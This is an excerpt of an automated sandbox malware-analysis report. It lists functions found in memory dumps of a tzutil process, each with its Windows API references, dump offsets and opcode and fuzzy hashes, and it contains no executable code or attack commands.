Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62DFA

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1e192c28518d372fe16c82274154c56db282cdbef1fb7c80f3baab35f564ad0b
Instruction ID: f9e282bb6745ca518407afa95cf0f52ad5a585fd184a1f80be8f0a41cb6c59f7
Opcode Fuzzy Hash: 1e192c28518d372fe16c82274154c56db282cdbef1fb7c80f3baab35f564ad0b
Instruction Fuzzy Hash: C490023220140813D111B15845097070009C7D0245F95C472A052855DD97568A52A121

Function 03B62DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62DDA

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3981810769040080f493acc22e000d8473d06ffa8bbce4a4243490a6240989fa
Instruction ID: 4d97cc86b185ed03cdc9ec52dee0b532466c823f68b125034ffc752901cc7329
Opcode Fuzzy Hash: 3981810769040080f493acc22e000d8473d06ffa8bbce4a4243490a6240989fa
Instruction Fuzzy Hash: 90900222242445525545F15844095074006D7E0245795C072A1518955C86269956D621

Function 03B62D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62D3A

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f0557b26dc61748b4532bfeac8c8dede526c5a9fe6ab2d15d440e09e63055b54
Instruction ID: 34e46a2afd59fc5e151e78e8bf8a261ac7e7694a703829ae8d2d8c4b8628ce1d
Opcode Fuzzy Hash: f0557b26dc61748b4532bfeac8c8dede526c5a9fe6ab2d15d440e09e63055b54
Instruction Fuzzy Hash: 9890022230140403D140B158541D6064005D7E1305F55D071E0518559CDA1589565222

Function 03B62D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62D1A

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 02743cffe45f889dc239b9c7755066dc3e03829db53ad48db4d8f049a5911589
Instruction ID: f77fca420a15dcebd8138834d21c7253def5f92393f91a458bdd62a27c7d56ba
Opcode Fuzzy Hash: 02743cffe45f889dc239b9c7755066dc3e03829db53ad48db4d8f049a5911589
Instruction Fuzzy Hash: 0790022A21340402D180B158540D60A0005C7D1206F95D475A011955DCCA1589695321

Function 03B62CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62CAA

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 44eaac21acec5c6ca33317e43f3f4458c763e9af4e3dfc6567385bba184420a9
Instruction ID: 32c21515da474e8d0e7f03421d43da2cb86da697b6ac73f97fc1bb1b8d609d5a
Opcode Fuzzy Hash: 44eaac21acec5c6ca33317e43f3f4458c763e9af4e3dfc6567385bba184420a9
Instruction Fuzzy Hash: 4290023220140802D100B598540D6460005C7E0305F55D071A512855AEC76589916131

Function 03B62C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62C7A

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 10be5de9ceccf10484b4fd1fcbb3653ba3057de5ed263ea4823fc490edf40559
Instruction ID: 68e1e8a71647b3f18bc3bfa54d8cd1785af9fceec91a5877a3556c165a255bf6
Opcode Fuzzy Hash: 10be5de9ceccf10484b4fd1fcbb3653ba3057de5ed263ea4823fc490edf40559
Instruction Fuzzy Hash: A690023220148C02D110B158840974A0005C7D0305F59C471A452865DD879589917121

Function 03B62C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62C6A

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c3d75e78bd19da58002e76acd72b941b8c51205f2da6830516bdd0042b3dce24
Instruction ID: d9b8d88b8f933a1df7da4860b56028adaec315fce6eca63be96d09e3b6255cb4
Opcode Fuzzy Hash: c3d75e78bd19da58002e76acd72b941b8c51205f2da6830516bdd0042b3dce24
Instruction Fuzzy Hash: A490023220140C42D100B1584409B460005C7E0305F55C076A0228659D8715C9517521

Function 03B635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B635CA

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c4e38f8306454da7e25e69fc3828cf1d7dc1ebb5bd12b365749d5837877e8a80
Instruction ID: 64f79e6801568257cca76486cc144d9dc5700b9102d83dc9e2aaff47fd111023
Opcode Fuzzy Hash: c4e38f8306454da7e25e69fc3828cf1d7dc1ebb5bd12b365749d5837877e8a80
Instruction Fuzzy Hash: D790023260550802D100B15845197061005C7D0205F65C471A052856DD87958A5165A2

Function 03B639B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B639BA

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2829b647d4444ff3f76b33825cbc9031f93c8a085a698b8c6fd326a867359b35
Instruction ID: 99ac1ecfea09b5980f808b868bcc7ab96ba504c62529985aac1629a9223e9782
Opcode Fuzzy Hash: 2829b647d4444ff3f76b33825cbc9031f93c8a085a698b8c6fd326a867359b35
Instruction Fuzzy Hash: BC90022224545502D150B15C44096164005E7E0205F55C071A0918599D865589556221

Function 032D0DE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(q3a81SS,00000111,00000000,00000000), ref: 032D0E57

Strings

q3a81SS, xrefs: 032D0E4C, 032D0E56, 032D0E67
q3a81SS, xrefs: 032D0E5E, 032D0E61

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: q3a81SS$q3a81SS
API String ID: 1836367815-3972413748
Opcode ID: ef0ac9acd1043bbbe08245aa08fca33b1428ecc5538c6eb8bed5ce3344129614
Instruction ID: d60e43ae7165af22ba40839e4ef53a6a0f1bf3d28ac1c990c60946d3d7c4dfd8
Opcode Fuzzy Hash: ef0ac9acd1043bbbe08245aa08fca33b1428ecc5538c6eb8bed5ce3344129614
Instruction Fuzzy Hash: 7001D676D1024D7ADB11EAE58C82DFF7B7CEF40694F448064FA04AB141D6785E464BB1

Function 032E3B40 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 032E3C1B

Strings

wininet.dll, xrefs: 032E3BAE, 032E3BBA
net.dll, xrefs: 032E3BD3, 032E3C66, 032E3C46, 032E3C52, 032E3C72

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 6e588402b97e3ba5d64bd9ade44943791f9a97fb1fde5444bed34266deda913b
Instruction ID: 7c9e195d68d23a5c452028475cf68272a846e8ab8b1490bc2c91e201c6927e70
Opcode Fuzzy Hash: 6e588402b97e3ba5d64bd9ade44943791f9a97fb1fde5444bed34266deda913b
Instruction Fuzzy Hash: 8A31A3B5610306BBD714DFA4CC85FEBB7B9FB84710F44452CA61A5B240C7B0A680CBA4

Function 032DF59A Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 032DF5B7
CoUninitialize.COMBASE ref: 032DF69E

Strings

@J7<, xrefs: 032DF5CB

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: db7756ed07b7d45786f5ee09032a813491603bb3784a3f83a86d76358ad511e1
Instruction ID: 5979e3d3d6c1aac6b3107b7edc9d057efb50b67cdc467964e2401276b8a61ade
Opcode Fuzzy Hash: db7756ed07b7d45786f5ee09032a813491603bb3784a3f83a86d76358ad511e1
Instruction Fuzzy Hash: A8312576A1020AAFDB00DFD8D8809EFB7B9FF48304B144559E516EB214D775EE458BA0

Function 032DF5A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 032DF5B7
CoUninitialize.COMBASE ref: 032DF69E

Strings

@J7<, xrefs: 032DF5CB

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 7f8f1e308f3ba2e7496c02f17328c33bdbccb25ec2fc71d6cb32a72f826d532a
Instruction ID: a2332d403d7d8a6b66828e5efa607031fb39007490ffba80e1f887020bd00be4
Opcode Fuzzy Hash: 7f8f1e308f3ba2e7496c02f17328c33bdbccb25ec2fc71d6cb32a72f826d532a
Instruction Fuzzy Hash: D9313276A1020AAFDF00DFD8D8809EFB7B9FF88304B148559E516EB214D775EE458BA0

Function 032D45B0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 032D4622

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: d20514dbed541711f06c5f50188ee8c907cd2a4cac65204c9f39392a3faeb9f2
Instruction ID: f8c6f93e102b7da81db53f9a8912032e124b39f432b1102afdf7279f4317819e
Opcode Fuzzy Hash: d20514dbed541711f06c5f50188ee8c907cd2a4cac65204c9f39392a3faeb9f2
Instruction Fuzzy Hash: 180171B9D1020EBBDF10EBE5DC42FDDB3B8AB14208F044194E9189B240FA71EB58CB91

Function 032E97B0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,?,032D83CE,00000010,?,?,?,00000044,?,00000010,032D83CE,?,?,?), ref: 032E9810

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: b9430d4237b192487147af20d7dda05c988cec88c93a14eea5518fce71c42fe1
Instruction ID: 2d2624beef1afe8f6cc5e49efdf657ecfbc3a1f1bd52bfba15974a6007c89d43
Opcode Fuzzy Hash: b9430d4237b192487147af20d7dda05c988cec88c93a14eea5518fce71c42fe1
Instruction Fuzzy Hash: 1C01C0B2214208BBCB44DE99DC81EEB77ADAF8C714F418208BA09E7240D630F8518BA4

Function 032C9B20 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 032C9B65

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: a7bc8f20659032d34348255361d67467cb615589764db8e390f7be8e7336fe6f
Instruction ID: 14210a4771dd37101f4cd09513d2323a523d1047fd7b3b28879c9104c9ea7f28
Opcode Fuzzy Hash: a7bc8f20659032d34348255361d67467cb615589764db8e390f7be8e7336fe6f
Instruction Fuzzy Hash: 4EF030773A031436E630A5A99C02FDBA64C8BC1661F540129F70DEB1C0D9A2B49142A9

Function 032C9B1C Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 032C9B65

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 981281d043514726e25c31a98c89ff1bcae5a13ffebd198eeb89110d4352a97b
Instruction ID: 13b133e74853e21a2d5116143858e7d0d4717b7943b28cca2140a9a0bf68c70a
Opcode Fuzzy Hash: 981281d043514726e25c31a98c89ff1bcae5a13ffebd198eeb89110d4352a97b
Instruction Fuzzy Hash: BCE092767A031076E630A5A58C03FDB665CCFC1B61F540129F709EF1C0E9E2F49082E9

Function 032E8390 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 032E83CD

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: Path$NameName_
String ID:
API String ID: 3514427675-0
Opcode ID: 45f0ff139867c97e17d2d02100cd93e49f279b90d95add770e9735f7cf466891
Instruction ID: 699b523149f5d4148c2bd938d1d2772a3558b77125a9028b43aacc8298185c8a
Opcode Fuzzy Hash: 45f0ff139867c97e17d2d02100cd93e49f279b90d95add770e9735f7cf466891
Instruction Fuzzy Hash: EAF039B92106047FC620EF4ADC41E9B77ACEFC9711F008509FA08A7281D670F8558BB4

Function 032E9730 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,C103CA33,00000007,00000000,00000004,00000000,032D3E29,000000F4), ref: 032E9769

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4fc3ec8936f6b1931ceba89b590bfce49c52afe1fdc88f053dc06a18979b8893
Instruction ID: 3a59fa21505f775dcb1b8e3e580406a631aaa60b7a70ba374eae51ffd2e53058
Opcode Fuzzy Hash: 4fc3ec8936f6b1931ceba89b590bfce49c52afe1fdc88f053dc06a18979b8893
Instruction Fuzzy Hash: B5E06576600304BBD620EF88DC41EAB73ACEF88710F408518F908AB241DA71B9218AB4

Function 032E96E0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00000000,?,00000000,?,?,032E185C,?), ref: 032E971C

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 866ad238b9475ed576715e4d4bc55d68e1c652e5d4aff164c9ce62ae2b67d712
Instruction ID: 424265f7f7a68e2d39e5ad44a118cbaf407d23c241bcf6e7b5048a15112611f3
Opcode Fuzzy Hash: 866ad238b9475ed576715e4d4bc55d68e1c652e5d4aff164c9ce62ae2b67d712
Instruction Fuzzy Hash: 10E065762007047BC620EE58DC46F9B33ACEFC8710F404408F909AB281E670B8108BB8

Function 032D8409 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 032D843C

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f16c07411372fa0df9329810ce808da6b9861832402ca5822e5c5177a8ac0dc0
Instruction ID: 42df05c91390a4353b7a60bc7615a253be7a75138e69fed006b32b8ff37f72e8
Opcode Fuzzy Hash: f16c07411372fa0df9329810ce808da6b9861832402ca5822e5c5177a8ac0dc0
Instruction Fuzzy Hash: 47E068716502062BFB20DF38CC46FA77714AF49370F4C46A4B859DF1C2DAB4E0D28200

Function 032D8410 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 032D843C

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5414b0788fa95a7c7f93d45f5a014221ac48396c32e4d8352a3644f5e36590f5
Instruction ID: 247d4b09b0d550881a6cdbeb10a1d673daaded72a1a92493888f6a7685af67e0
Opcode Fuzzy Hash: 5414b0788fa95a7c7f93d45f5a014221ac48396c32e4d8352a3644f5e36590f5
Instruction Fuzzy Hash: 8BE026712A03052BFB20EAACDC46F67334C9B48730F4C0660B91CCB6C1E5B8F4914155

Function 032D8200 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,032D1D80,032E807E,032E573E,032D1D46), ref: 032D8233

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2b7fb5ed27da2e51a8166899056f3c3a9c877a5395a0e2b1048a315926923c51
Instruction ID: 810cdd02f4fd549bfac7f0d7e02748182826f9e0df2c0d2f8647a45a6bb5f173
Opcode Fuzzy Hash: 2b7fb5ed27da2e51a8166899056f3c3a9c877a5395a0e2b1048a315926923c51
Instruction Fuzzy Hash: 5DD05B756D03063BFA10EAA4DC0BF5A314C9B406A0F454078B54CDB2C2DCA5F1604579

Function 032D81F7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,032D1D80,032E807E,032E573E,032D1D46), ref: 032D8233

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 3e25d6b1ca750c273bd00f13019b49817918602393bc8a50d1b197411348199e
Instruction ID: f7e3b39fe0648ac398c08b39d35a8a9ffb2fa20b55bccc12983e2c49e479a379
Opcode Fuzzy Hash: 3e25d6b1ca750c273bd00f13019b49817918602393bc8a50d1b197411348199e
Instruction Fuzzy Hash: 36B0121E3E45021AF910E4F07C057FA23867390AA0F418050B50CC88C0D99240010401

Function 03B62C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62C24

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c77c4b6a3e087fd16a700846609c2d50ea5808ee05c59f4cd6c43db0fc42c27
Instruction ID: c96c43fd9e8273dade85d495a3d329cc009aef671400d65721e7e40d78012706
Opcode Fuzzy Hash: 9c77c4b6a3e087fd16a700846609c2d50ea5808ee05c59f4cd6c43db0fc42c27
Instruction Fuzzy Hash: 0AB09B729015C5C9EA11E760460D7177904E7D0705F19C4F1D2134646F473DC1D1E175

Non-executed Functions

Function 0399E009 Relevance: 56.5, Strings: 45, Instructions: 249COMMON

Download Yara Rule

Strings

?, xrefs: 0399E200
@@@@, xrefs: 0399E186
@@@@, xrefs: 0399E1D3
@@@?, xrefs: 0399E083
@@@@, xrefs: 0399E163
<=@@, xrefs: 0399E098
@@@@, xrefs: 0399E194
!"#$, xrefs: 0399E0EC
@@@@, xrefs: 0399E0D7
123@, xrefs: 0399E108
@@@@, xrefs: 0399E14E
)*+,, xrefs: 0399E0FA
%&'(, xrefs: 0399E0F3
4567, xrefs: 0399E08A
@@@@, xrefs: 0399E16A
@@@@, xrefs: 0399E12B
@@@@, xrefs: 0399E09F
@@@@, xrefs: 0399E178
@@@@, xrefs: 0399E139
@@@@, xrefs: 0399E124
@@@@, xrefs: 0399E1CC
@@@@, xrefs: 0399E1EF
@@@@, xrefs: 0399E1C5
@@@@, xrefs: 0399E1B7
@@@@, xrefs: 0399E1B0
@@@@, xrefs: 0399E1A9
@@@@, xrefs: 0399E11D
@@@@, xrefs: 0399E19B
@@@@, xrefs: 0399E15C
-./0, xrefs: 0399E101
@@@@, xrefs: 0399E132
@@@@, xrefs: 0399E147
@@@@, xrefs: 0399E155
@@@@, xrefs: 0399E1BE
@@@@, xrefs: 0399E10F
89:;, xrefs: 0399E091
@@@@, xrefs: 0399E116
@@@@, xrefs: 0399E171
@@@@, xrefs: 0399E1E8
@@@@, xrefs: 0399E17F
@@@@, xrefs: 0399E18D
@@@@, xrefs: 0399E1E1
@@@@, xrefs: 0399E1A2
@@@@, xrefs: 0399E140
@@@@, xrefs: 0399E1DA

Memory Dump Source

Source File: 00000006.00000002.4510823279.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3990000_tzutil.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: e696790ba4092f556cde5174688e67ab53f88a90c658e0651f9da09df1d8fefc
Instruction ID: 73bd2d7311859ffecb7aa28c2e78dbcd1651750452e7418a365dad29069feabc
Opcode Fuzzy Hash: e696790ba4092f556cde5174688e67ab53f88a90c658e0651f9da09df1d8fefc
Instruction Fuzzy Hash: F3A150F04182948AC7198F58A0652AFFFB1EBC6305F15816DE6E6BB243C37E8905CB95

Function 03B62890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

